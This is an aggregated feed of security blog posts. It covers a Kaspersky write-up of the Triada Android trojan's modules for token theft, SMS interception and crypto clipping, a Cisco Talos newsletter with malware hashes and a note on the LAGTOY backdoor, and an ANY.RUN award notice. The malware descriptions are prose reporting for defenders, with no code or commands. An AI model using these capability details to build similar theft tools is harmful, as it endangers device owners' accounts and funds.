Browsers. Triada threatens a number of browsers: Chrome, Opera, Mozilla, and some others. The full list is available in the Securelist article. The module connects to the C2 server over TCP and randomly redirects legitimate links in the browsers to advertising sites for now. However, because the Trojan downloads redirect links from its C2 server, attackers can direct users to phishing sites at any time.
WhatsApp. Again, there are two modules. The first one collects and sends data about the active session to the C2 server every five minutes — giving the attackers full access to the victim’s account. The second one intercepts the client functions for sending and receiving messages, which allows the malware to send and then delete arbitrary instant messages to cover its tracks.
LINE. The dedicated Triada module collects internal app data, including authentication data (access token), every 30 seconds, and forwards it the C2 server. In this case, too, someone else assumes full control of the user’s account.
Skype. Although Skype is about to be retired, Triada still has a module for infecting it. Triada uses several methods to obtain the authentication token and then sends it to the C2 server.
TikTok. This module can collect a lot of data about the victim’s account from cookie files in the internal directory, and also extract data required for communicating with the TikTok API.
Facebook. Triada is armed with two modules for this app. One of them steals authentication cookies, and the other sends information about the infected device to the C2 server.
Of course, there are also modules for SMS and calls. The first SMS module allows the malware to filter all incoming messages and extract codes from them, respond to some messages (likely to subscribe victims to paid services) and send arbitrary SMS messages when instructed by the C2 server. The second, auxiliary module disables the built-in Android protection against SMS Trojans that requests user permission before sending messages to short codes (Premium SMS), which could be used to confirm paid subscriptions.
The call module embeds itself in the phone app, but it’s most likely still under development. We discovered that it partially implements phone number spoofing — something we expect to be completed soon.
Another module, a reverse proxy, turns the victim’s smartphone into a reverse proxy server, giving attackers access to arbitrary IP addresses on behalf of the victim.
Not unexpectedly, Triada also targets crypto owners, with a special surprise awaiting them: a clipper. The Trojan watches the clipboard for crypto wallet addresses, substituting one of the attackers’ own. A crypto stealer analyzes the victim’s activity, replacing crypto wallet addresses with a fraudulent addresses anywhere it can, whenever an attempt is made to withdraw cryptocurrency. It even interferes with button tap handlers inside apps and replaces images with generated QR codes that link to the attackers’ wallet addresses. The criminals have managed to steal more than US$264 000 in various cryptocurrencies since June 13, 2024 with the help of these tools.
See our Securelist report for a full list of Triada features and a detailed technical analysis.
In every infection case that we are aware of, the firmware name on the device differed from the official one by a single letter. For example, the official firmware was TGPMIXM, while the infected phones had TGPMIXN. We found posts on relevant discussion boards where users complained about counterfeit devices purchased from online stores.
It’s likely that a stage in the supply chain was compromised, while the stores had no idea they were distributing devices infected with Triada. Meanwhile, it’s practically impossible to determine exactly when the malware was placed inside the smartphones.
The new version of the Trojan was found pre-installed on counterfeit devices. Therefore, the best way to avoid Triada infection is to buy smartphones from authorized dealers only. If you suspect that your phone may have been infected with Triada (or another Trojan), here are our recommendations.
Triada is far from the only mobile Trojan. Follow these links for our stories about other Android malware:
Kaspersky official blog – Read More
Welcome to this week’s edition of the Threat Source newsletter.
“Be curious, not judgmental,” Ted Lasso says, misattributing Walt Whitman. We forgive Ted because… well, he’s Ted Lasso.
If you’ve not watched the first season of Ted Lasso, there is a defining moment where Ted confronts a nefarious bully. While putting him in his place with kindness and skill, Ted refers to this quote. It’s a defining moment not only for Ted but for the secondary and tertiary characters in the scene. One of the questions that I’m asked most when public speaking is “How do I get into Talos?” For people considering a new career, it’s “How do I get into cybersecurity?” To all those questions, my answer is “Be curious, not judgmental.”
I think there is no greater skill necessary in security than intellectual curiosity. If you have that, you can learn the rest. The hiring process to get in the door at Talos is extremely challenging and the candidates are incredible. That’s why when I interview candidates for various roles in Talos I rarely, if ever, fixate on a niche skillset, instead focusing on the prospective employee’s intellectual curiosity. I ask weird questions that don’t seem related to the specific job role, not in an effort to throw them off but simply because I am curious and hope that they are as well.
Do you like to read? Do you ever read books outside of your normal wheelhouse? What are some favorite fiction and non-fiction books? Do you have a favorite craft or hobby? How many different Linux distributions have you installed? What are your 5 favorite board games? Do you play video games, and if so, what are a few favorites from each platform and decade?
These kinds of questions help me identify what kind of innate curiosity that the prospective candidate possesses and from their answers we will invariably fall down a rabbit hole while my co-workers shake their heads at me in disdain.
Beyond that, I always listen for my favorite answer: “I don’t know, but…” There’s no better answer to a very difficult question than “I don’t know, but I’d probably try X,” or “I don’t know, but I’d love to learn…”
Barbecue sauce.
Cisco Talos has released a blog post on the initial access broker (IAB) we call “ToyMaker” — a financially-motivated threat actor. They deploy their custom-made backdoor we call “LAGTOY” and extract credentials from the victim enterprise. LAGTOY can be used to create reverse shells and execute commands on infected endpoints.
A compromise by LAGTOY may result in access handover to a secondary threat actor. Specifically, we’ve observed ToyMaker hand over access to Cactus, a double extortion gang who employed their own tactics, techniques and procedures (TTPs) to carry out malicious actions across the victim’s network. Our blog details a timeline with turnaround time from ToyMaker to Cactus.
Cisco Talos has released information to help ensure protection including techniques and related IOCs. Check out the blog post for full details.
Apple says zero-day bugs exploited against ‘specific targeted individuals’ using iOS. Apple has released new software updates across its product line to fix two security vulnerabilities, which the company said may have been actively used to hack customers running its mobile software, iOS. (TechCrunch)
Microsoft purges millions of cloud tenants in the wake of Storm-0558. In an effort to thwart state-sponsored activity stemming from preventable security issues, Microsoft is making significant efforts to purge inactive Azure cloud tenants and take comprehensive inventory of cloud and network assets. (DarkReading)
Researchers warn of critical flaw found in Erlang OTP SSH. The vulnerability could allow unauthenticated attackers to gain full access to a device. Many of these devices are widely used in IoT and telecom platforms. (cybersecuritydrive)
CISA flags actively exploited vulnerability in SonicWall SMA devices. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added a security flaw impacting SonicWall Secure Mobile Access 100 Series gateways to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation. (The Hacker News)
SHA256: 2462569cf24a5a1e313390fa3c52ed05c7f36ef759c4c8f5194348deca022277
MD5: 42c016ce22ab7360fb7bc7def3a17b04
VirusTotal: https://www.virustotal.com/gui/file/2462569cf24a5a1e313390fa3c52ed05c7f36ef759c4c8f5194348deca022277
Typical Filename: Rainmeter-4.5.22.exe
Detection Name: Artemis!Trojan
SHA 256:7b3ec2365a64d9a9b2452c22e82e6d6ce2bb6dbc06c6720951c9570a5cd46fe5
MD5: ff1b6bb151cf9f671c929a4cbdb64d86
VirusTotal : https://www.virustotal.com/gui/file/7b3ec2365a64d9a9b2452c22e82e6d6ce2bb6dbc06c6720951c9570a5cd46fe5
Typical Filename: endpoint.query
Detection Name: W32.File.MalParent
SHA256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507
MD5: 2915b3f8b703eb744fc54c81f4a9c67f
VirusTotal: https://www.virustotal.com/gui/file/9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507
Typical Filename: VID001.exe
Detection Name: Win.Worm.Bitmin-9847045-0
SHA 256: a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91
MD5: 7bdbd180c081fa63ca94f9c22c457376
VirusTotal: https://www.virustotal.com/gui/file/a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91
Typical Filename: IMG001.exe
Detection Name: Win.Trojan.Miner-9835871-0
Cisco Talos Blog – Read More
We are honored to announce that ANY.RUN became a gold winner at the annual Globee Business Awards 2025. The award aims to recognize and celebrate excellence in various industries worldwide, including cybersecurity.
Our solution, ANY.RUN’s TI Lookup, was named best in the Cyber Threat Intelligence category. We believe that threat intelligence is an essential aspect of ensuring the cybersecurity of organizations, and recognition in this sphere is important to us.
We’d like to thank you—our readers, partners, users of our products, and all fellow cybersecurity enthusiasts and professionals! The victory itself is not as important as the fact that it stands for continuous support from the community and acknowledgement of our high-quality products benefiting thousands of businesses.
TI Lookup is a search engine that gives users the opportunity to navigate ANY.RUN’s database of fresh and unique information on cyber attacks. It is continuously enriched with extensive data on the latest threats analyzed by 500,000 security professionals and 15,000 companies in ANY.RUN’s Interactive Sandbox.
As a result, it contains a wealth of indicators and events logged during analyses, including IOCs, IOAs, and IOBs.
Threat Intelligence Lookup helps you:
It means a lot to us that the expert committee once again expressed their appreciation of our efforts. Previously our flagship product ANY.RUN’s Interactive Sandbox was announced a silver winner in the Outstanding Threat Detection and Response category at Globee Awards 2025.
ANY.RUN creates products for malware analysts and SOC teams, such as ANY.RUN’s Interactive Sandbox, TI Lookup and TI Feeds. They help accelerate the work of security specialists of all tiers and benefit businesses by providing helpful insights that allow them to minimize harmful consequences of cyber attacks or avoid them altogether.
Integrate ANY.RUN’s award-winning services in your organization to strengthen your security →
The post ANY.RUN Becomes a Gold Winner in Threat Intelligence at Globee Awards 2025 appeared first on ANY.RUN’s Cybersecurity Blog.
ANY.RUN’s Cybersecurity Blog – Read More